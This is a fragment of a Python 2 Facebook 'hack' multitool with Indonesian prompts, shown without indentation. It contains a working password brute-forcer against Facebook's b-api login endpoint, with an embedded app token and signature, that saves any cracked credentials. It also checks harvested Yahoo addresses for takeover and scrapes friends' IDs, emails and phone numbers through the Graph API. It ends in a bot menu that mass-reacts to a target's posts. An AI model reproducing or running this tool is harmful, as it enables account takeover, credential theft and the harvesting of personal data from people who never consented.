if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
